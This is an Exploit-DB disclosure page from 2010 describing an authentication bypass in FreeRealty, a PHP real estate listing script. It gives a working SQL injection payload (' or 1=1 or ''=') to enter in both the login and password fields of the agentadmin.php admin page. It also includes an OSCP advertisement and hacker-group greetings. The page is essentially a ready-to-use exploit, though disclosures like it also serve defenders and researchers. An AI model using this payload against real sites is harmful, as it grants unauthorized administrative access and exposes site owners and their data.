FreeRealty(Free Real Estate Listing Software) - Authentication Bypass

EDB-ID:

12411




Platform:

PHP

Date:

2010-04-27


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# Exploit Title: Authentication bypass in FreeRealty(Free Real Estate Listing Software)
# Date: 27-apr-2010
# Author: Sid3^effects
# Software Link: N/a
# CVE : []
# Code : []                   ______________________________________________________________________________                               Authentication bypass in FreeRealty
                       Vendor:http://freerealty.rwcinc.net/
      ___________________________Author:Sid3^effects_________________________________
  

Description :

 Free Realty  is primarily designed for real estate agents and offices to list properties on the internet. With Free Realty the end user does not need to be fluent in web page design.
 

script cost :Free
---------------------------------------------------------------------------
	* Authentication bypass:

	The following script has authentication bypass.

	use ' or 1=1 or ''=' in both login and password.

DEMO :http://[site]/demo/agentadmin.php


ShoutZ :
------- 
               ---Indian Cyber warriors--Andhra hackers-- 

Greetz :
--------
 ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--